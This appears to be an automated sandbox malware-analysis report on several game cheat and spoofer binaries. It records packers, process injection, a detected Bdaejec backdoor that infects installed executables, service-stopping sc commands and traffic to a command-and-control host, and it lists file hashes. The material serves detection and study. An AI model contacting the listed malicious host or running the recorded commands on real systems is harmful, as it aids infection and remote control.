| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\rundll32.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 5972 wrote to memory of 5744 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 5972 wrote to memory of 5744 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 5972 wrote to memory of 5744 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Deadly.dll,#1
C:\Windows\SysWOW64\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Deadly.dll,#1
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 464 -p 5744 -ip 5744
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5744 -s 576
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 5744 -ip 5744
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5744 -s 808
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 0.205.248.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 149.220.183.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 134.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 209.205.72.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 58.55.71.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 200.163.202.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 198.187.3.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.214.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 29.243.111.52.in-addr.arpa | udp |
Files
Analysis: behavioral24
Detonation Overview
Submitted
2024-12-02 16:10
Reported
2024-12-02 16:14
Platform
win10ltsc2021-20241023-en
Max time kernel
149s
Max time network
156s
Command Line
Signatures
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\rundll32.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 4696 wrote to memory of 2660 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 4696 wrote to memory of 2660 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 4696 wrote to memory of 2660 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\tmpfile-main\ZeroHack.dll,#1
C:\Windows\SysWOW64\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\tmpfile-main\ZeroHack.dll,#1
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 58.55.71.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 0.205.248.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 68.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 53.210.109.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 15.164.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.214.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 0.204.248.87.in-addr.arpa | udp |
Files
Analysis: behavioral26
Detonation Overview
Submitted
2024-12-02 16:10
Reported
2024-12-02 16:14
Platform
win10ltsc2021-20241023-en
Max time kernel
149s
Max time network
156s
Command Line
Signatures
Themida packer
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\rundll32.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 1544 wrote to memory of 1636 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 1544 wrote to memory of 1636 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 1544 wrote to memory of 1636 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\tmpfile-main\gamesnus.dll,#1
C:\Windows\SysWOW64\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\tmpfile-main\gamesnus.dll,#1
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 58.55.71.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 216.203.100.95.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 71.31.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 149.220.183.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 53.210.109.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 206.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.214.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 30.243.111.52.in-addr.arpa | udp |
| SE | 192.229.221.95:80 |  | tcp |
Files
memory/1636-0-0x0000000074880000-0x0000000074D13000-memory.dmp
Analysis: behavioral10
Detonation Overview
Submitted
2024-12-02 16:10
Reported
2024-12-02 16:14
Platform
win10ltsc2021-20241023-en
Max time kernel
148s
Max time network
156s
Command Line
Signatures
VMProtect packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Suspicious use of NtSetInformationThreadHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Hybris_ZeroHackSafe.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Hybris_ZeroHackSafe.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Hybris_ZeroHackSafe.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Hybris_ZeroHackSafe.exe
"C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Hybris_ZeroHackSafe.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 149.220.183.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.214.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 71.31.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 53.210.109.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 171.39.242.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 201.203.100.95.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 30.243.111.52.in-addr.arpa | udp |
Files
memory/4340-0-0x00007FF6820D9000-0x00007FF682442000-memory.dmp
memory/4340-1-0x00007FFBD0150000-0x00007FFBD0152000-memory.dmp
memory/4340-2-0x00007FFBD0160000-0x00007FFBD0162000-memory.dmp
memory/4340-4-0x00007FF6820D0000-0x00007FF68297F000-memory.dmp
memory/4340-5-0x00007FF6820D9000-0x00007FF682442000-memory.dmp
memory/4340-6-0x00007FF6820D0000-0x00007FF68297F000-memory.dmp
Analysis: behavioral22
Detonation Overview
Submitted
2024-12-02 16:10
Reported
2024-12-02 16:14
Platform
win10ltsc2021-20241023-en
Max time kernel
90s
Max time network
168s
Command Line
Signatures
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Spoofer.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\MontanaSpoofer.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\MontanaSpoofer.exe | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ip-api.com | N/A | N/A |
Enumerates physical storage devices
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemVersion | C:\Users\Admin\AppData\Local\Temp\MontanaSpoofer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Users\Admin\AppData\Local\Temp\MontanaSpoofer.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Users\Admin\AppData\Local\Temp\MontanaSpoofer.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Spoofer.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 4988 wrote to memory of 948 | N/A | C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Spoofer.exe | C:\Users\Admin\AppData\Local\Temp\MontanaSpoofer.exe |
| PID 4988 wrote to memory of 948 | N/A | C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Spoofer.exe | C:\Users\Admin\AppData\Local\Temp\MontanaSpoofer.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Spoofer.exe
"C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Spoofer.exe"
C:\Users\Admin\AppData\Local\Temp\MontanaSpoofer.exe
"C:\Users\Admin\AppData\Local\Temp\MontanaSpoofer.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 58.55.71.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 216.203.100.95.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 20.160.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 8.8.8.8:53 | 149.220.183.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 1.112.95.208.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 241.150.49.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 206.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 212.20.149.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.214.232.199.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\MontanaSpoofer.exe
| MD5 | 6606c3f98d9f8fae5e9c5337eec434c4 |
| SHA1 | ea0d27f6ee5c7d5a97cdaebac02e48da5a17e577 |
| SHA256 | a48b56504cd8581af88cf3d4dd61549e3d00573318962ab1c3af53aef723c337 |
| SHA512 | 7e8787c296123cf0306adc5e545119bb345b4f267beb03a5657eeb4d59673eeac05c04307abeb9dc1cd91290f71736d6d8991049eddacdda44f9cf6c6b631599 |
C:\Users\Admin\AppData\Local\Temp\MontanaSpoofer.runtimeconfig.json
| MD5 | 9db099f143ead47e224653d0dde19fe9 |
| SHA1 | d050db767fc64aa1705353132da3e35048475d3c |
| SHA256 | 7e79af92820e50910b90f1cade2728f45987393f24b50e384dc225d9773b7194 |
| SHA512 | 579c3c870903b3d47dbc2567153fa7c73e0aa47387c6969b8982037884033a4b25de702e0efb8c7ae717b6b463192b917b18a79b1ef5f8c969f257422af2b65f |
C:\Users\Admin\AppData\Local\Temp\MontanaSpoofer.deps.json
| MD5 | 1f8022d231b0c479e19eb86a10312c4f |
| SHA1 | eebe57abb1999de25b03fb23c6247e420c3f355b |
| SHA256 | 86c9558da38267d785e4f6d78056778b673aaed42cbd8f704b1dd64811d08f3d |
| SHA512 | 3c14143d5d9d60f9c8f572276c4f6d0ee0712760ce63fddae620f099fdf46e28f15f929584737e3cb028fffa4ba2819550f66a68f90cc8a3a2ebdbf9d7dfbd94 |
C:\Users\Admin\AppData\Local\Temp\MontanaSpoofer.dll
| MD5 | d0902a9df335a37f1dd5ad5ce1223928 |
| SHA1 | e1526d6ecc8c293333a6d6b813260349a18b140f |
| SHA256 | 275c1257d4c2dacc787f3f80f2cdc2328552f09d8c87b5b6226a9cd712dd8f0b |
| SHA512 | 4d1c655a4cd44c0e3e28234ab87c4f0331d02a5ee9c4d340dd6c4b765d88b27ddcced490bec9010cfd5ea6376ce45c1d7143656998ee2018b3516a1c36d3e218 |
C:\Users\Admin\AppData\Local\Temp\Guna.UI2.dll
| MD5 | b429ae86c5be521bc8ca3b164cec3acb |
| SHA1 | 387560073ff5a1f2191abc6f75fc34532bbb6dd2 |
| SHA256 | 3ac70532408b89159bfe235d4ed228faa03ae3fbd63ec6a82d895f287a3b0579 |
| SHA512 | eae65de53da50708983ed8ebf9e1e3dd5f9aea95a354d272e199bb59517f62bfe35f0df7a37d81ab0423d0d6d29304fa70284c731bd54023e446b2c19bacafb1 |
Analysis: behavioral4
Detonation Overview
Submitted
2024-12-02 16:10
Reported
2024-12-02 16:14
Platform
win10ltsc2021-20241023-en
Max time kernel
97s
Max time network
146s
Command Line
Signatures
Checks BIOS information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\tmpfile-main\ExecuteSafe.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\tmpfile-main\ExecuteSafe.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\tmpfile-main\ExecuteSafe.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\tmpfile-main\ExecuteSafe.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\tmpfile-main\ExecuteSafe.exe
"C:\Users\Admin\AppData\Local\Temp\tmpfile-main\ExecuteSafe.exe"
Network
Files
Analysis: behavioral6
Detonation Overview
Submitted
2024-12-02 16:10
Reported
2024-12-02 16:14
Platform
win10ltsc2021-20241023-en
Max time kernel
149s
Max time network
159s
Command Line
Signatures
Bdaejec
Bdaejec family
Detects Bdaejec Backdoor.
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Stops running service(s)
ASPack v2.12-2.42
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-3785588363-1079601362-4184885025-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\iakPKCCS.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\iakPKCCS.exe | N/A |
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Program Files\Java\jdk-1.8\jre\bin\javaws.exe | C:\Users\Admin\AppData\Local\Temp\iakPKCCS.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Integration\Integrator.exe | C:\Users\Admin\AppData\Local\Temp\iakPKCCS.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Office16\MSOSYNC.EXE | C:\Users\Admin\AppData\Local\Temp\iakPKCCS.exe | N/A |
| File opened for modification | C:\Program Files\VideoLAN\VLC\vlc.exe | C:\Users\Admin\AppData\Local\Temp\iakPKCCS.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe | C:\Users\Admin\AppData\Local\Temp\iakPKCCS.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk-1.8\bin\javah.exe | C:\Users\Admin\AppData\Local\Temp\iakPKCCS.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk-1.8\bin\jps.exe | C:\Users\Admin\AppData\Local\Temp\iakPKCCS.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk-1.8\bin\jstat.exe | C:\Users\Admin\AppData\Local\Temp\iakPKCCS.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk-1.8\bin\jstatd.exe | C:\Users\Admin\AppData\Local\Temp\iakPKCCS.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk-1.8\jre\bin\jabswitch.exe | C:\Users\Admin\AppData\Local\Temp\iakPKCCS.exe | N/A |
| File opened for modification | C:\Program Files\Google\Chrome\Application\123.0.6312.123\Installer\setup.exe | C:\Users\Admin\AppData\Local\Temp\iakPKCCS.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk-1.8\bin\jhat.exe | C:\Users\Admin\AppData\Local\Temp\iakPKCCS.exe | N/A |
| File opened for modification | C:\Program Files\Java\jre-1.8\bin\ktab.exe | C:\Users\Admin\AppData\Local\Temp\iakPKCCS.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Office16\misc.exe | C:\Users\Admin\AppData\Local\Temp\iakPKCCS.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk-1.8\jre\bin\javacpl.exe | C:\Users\Admin\AppData\Local\Temp\iakPKCCS.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Office16\ADDINS\Microsoft Power Query for Excel Integrated\bin\Microsoft.Mashup.Container.NetFX45.exe | C:\Users\Admin\AppData\Local\Temp\iakPKCCS.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Office16\MSQRY32.EXE | C:\Users\Admin\AppData\Local\Temp\iakPKCCS.exe | N/A |
| File opened for modification | C:\Program Files\Mozilla Firefox\plugin-container.exe | C:\Users\Admin\AppData\Local\Temp\iakPKCCS.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk-1.8\jre\bin\jp2launcher.exe | C:\Users\Admin\AppData\Local\Temp\iakPKCCS.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk-1.8\jre\bin\pack200.exe | C:\Users\Admin\AppData\Local\Temp\iakPKCCS.exe | N/A |
| File opened for modification | C:\Program Files\Java\jre-1.8\bin\kinit.exe | C:\Users\Admin\AppData\Local\Temp\iakPKCCS.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE | C:\Users\Admin\AppData\Local\Temp\iakPKCCS.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk-1.8\bin\javadoc.exe | C:\Users\Admin\AppData\Local\Temp\iakPKCCS.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk-1.8\jre\bin\ktab.exe | C:\Users\Admin\AppData\Local\Temp\iakPKCCS.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Office16\ORGCHART.EXE | C:\Users\Admin\AppData\Local\Temp\iakPKCCS.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Office16\PDFREFLOW.EXE | C:\Users\Admin\AppData\Local\Temp\iakPKCCS.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe | C:\Users\Admin\AppData\Local\Temp\iakPKCCS.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk-1.8\bin\javac.exe | C:\Users\Admin\AppData\Local\Temp\iakPKCCS.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\DW\DWTRIG20.EXE | C:\Users\Admin\AppData\Local\Temp\iakPKCCS.exe | N/A |
| File opened for modification | C:\Program Files\Mozilla Firefox\default-browser-agent.exe | C:\Users\Admin\AppData\Local\Temp\iakPKCCS.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Google\Update\1.3.36.371\GoogleUpdateOnDemand.exe | C:\Users\Admin\AppData\Local\Temp\iakPKCCS.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\vfs\ProgramFilesX86\Microsoft Office\Office16\DCF\Common.DBConnection64.exe | C:\Users\Admin\AppData\Local\Temp\iakPKCCS.exe | N/A |
| File opened for modification | C:\Program Files\Windows Defender Advanced Threat Protection\SenseNdr.exe | C:\Users\Admin\AppData\Local\Temp\iakPKCCS.exe | N/A |
| File opened for modification | C:\Program Files\Google\Chrome\Application\chrome_proxy.exe | C:\Users\Admin\AppData\Local\Temp\iakPKCCS.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk-1.8\bin\javapackager.exe | C:\Users\Admin\AppData\Local\Temp\iakPKCCS.exe | N/A |
| File opened for modification | C:\Program Files\Mozilla Firefox\maintenanceservice_installer.exe | C:\Users\Admin\AppData\Local\Temp\iakPKCCS.exe | N/A |
| File opened for modification | C:\Program Files\Windows Defender\NisSrv.exe | C:\Users\Admin\AppData\Local\Temp\iakPKCCS.exe | N/A |
| File opened for modification | C:\Program Files\Windows Defender Advanced Threat Protection\SenseGPParser.exe | C:\Users\Admin\AppData\Local\Temp\iakPKCCS.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Office16\NAMECONTROLSERVER.EXE | C:\Users\Admin\AppData\Local\Temp\iakPKCCS.exe | N/A |
| File opened for modification | C:\Program Files\Windows Defender Advanced Threat Protection\SenseCM.exe | C:\Users\Admin\AppData\Local\Temp\iakPKCCS.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Google\Update\Install\{FE07C881-CD99-4B87-9410-B9C83C0E2377}\chrome_installer.exe | C:\Users\Admin\AppData\Local\Temp\iakPKCCS.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk-1.8\bin\extcheck.exe | C:\Users\Admin\AppData\Local\Temp\iakPKCCS.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk-1.8\jre\bin\java.exe | C:\Users\Admin\AppData\Local\Temp\iakPKCCS.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Office16\GRAPH.EXE | C:\Users\Admin\AppData\Local\Temp\iakPKCCS.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\vfs\ProgramFilesX64\Microsoft Analysis Services\AS OLEDB\140\SQLDumper.exe | C:\Users\Admin\AppData\Local\Temp\iakPKCCS.exe | N/A |
| File opened for modification | C:\Program Files\dotnet\shared\Microsoft.NETCore.App\8.0.2\createdump.exe | C:\Users\Admin\AppData\Local\Temp\iakPKCCS.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk-1.8\bin\idlj.exe | C:\Users\Admin\AppData\Local\Temp\iakPKCCS.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk-1.8\bin\pack200.exe | C:\Users\Admin\AppData\Local\Temp\iakPKCCS.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk-1.8\jre\bin\java-rmi.exe | C:\Users\Admin\AppData\Local\Temp\iakPKCCS.exe | N/A |
| File opened for modification | C:\Program Files\Java\jre-1.8\bin\keytool.exe | C:\Users\Admin\AppData\Local\Temp\iakPKCCS.exe | N/A |
| File opened for modification | C:\Program Files\Mozilla Firefox\minidump-analyzer.exe | C:\Users\Admin\AppData\Local\Temp\iakPKCCS.exe | N/A |
| File opened for modification | C:\Program Files\Java\jre-1.8\bin\klist.exe | C:\Users\Admin\AppData\Local\Temp\iakPKCCS.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\vfs\ProgramFilesX86\Microsoft Office\Office16\DCF\Common.ShowHelp.exe | C:\Users\Admin\AppData\Local\Temp\iakPKCCS.exe | N/A |
| File opened for modification | C:\Program Files\Google\Chrome\Application\123.0.6312.123\notification_helper.exe | C:\Users\Admin\AppData\Local\Temp\iakPKCCS.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Office16\ADDINS\Microsoft Power Query for Excel Integrated\bin\Microsoft.Mashup.Container.NetFX40.exe | C:\Users\Admin\AppData\Local\Temp\iakPKCCS.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\EQUATION\eqnedt32.exe | C:\Users\Admin\AppData\Local\Temp\iakPKCCS.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Office16\ADDINS\Microsoft Power Query for Excel Integrated\bin\Microsoft.Mashup.Container.Loader.exe | C:\Users\Admin\AppData\Local\Temp\iakPKCCS.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk-1.8\bin\jsadebugd.exe | C:\Users\Admin\AppData\Local\Temp\iakPKCCS.exe | N/A |
| File opened for modification | C:\Program Files\Java\jre-1.8\bin\unpack200.exe | C:\Users\Admin\AppData\Local\Temp\iakPKCCS.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Office16\PerfBoost.exe | C:\Users\Admin\AppData\Local\Temp\iakPKCCS.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE | C:\Users\Admin\AppData\Local\Temp\iakPKCCS.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office 15\ClientX64\IntegratedOffice.exe | C:\Users\Admin\AppData\Local\Temp\iakPKCCS.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Windows Mail\wabmig.exe | C:\Users\Admin\AppData\Local\Temp\iakPKCCS.exe | N/A |
| File opened for modification | C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.27\createdump.exe | C:\Users\Admin\AppData\Local\Temp\iakPKCCS.exe | N/A |
Launches sc.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\sc.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\sc.exe | N/A |
Enumerates physical storage devices
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Gaming Chair.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\iakPKCCS.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\sc.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\sc.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Gaming Chair.exe
"C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Gaming Chair.exe"
C:\Users\Admin\AppData\Local\Temp\iakPKCCS.exe
C:\Users\Admin\AppData\Local\Temp\iakPKCCS.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c sc start FairplayKD > NUL 2>&1
C:\Windows\SysWOW64\sc.exe
sc start FairplayKD
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c sc stop %c > NUL 2>&1
C:\Windows\SysWOW64\sc.exe
sc stop %c
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\4c6c54cc.bat" "
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 13.86.106.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 0.205.248.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | ddos.dnsnb8.net | udp |
| US | 44.221.84.105:799 | ddos.dnsnb8.net | tcp |
| US | 44.221.84.105:799 | ddos.dnsnb8.net | tcp |
| US | 8.8.8.8:53 | 105.84.221.44.in-addr.arpa | udp |
| US | 44.221.84.105:799 | ddos.dnsnb8.net | tcp |
| US | 44.221.84.105:799 | ddos.dnsnb8.net | tcp |
| US | 44.221.84.105:799 | ddos.dnsnb8.net | tcp |
| US | 8.8.8.8:53 | 72.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.211.185.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 56.163.245.4.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 198.187.3.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 201.203.100.95.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\iakPKCCS.exe
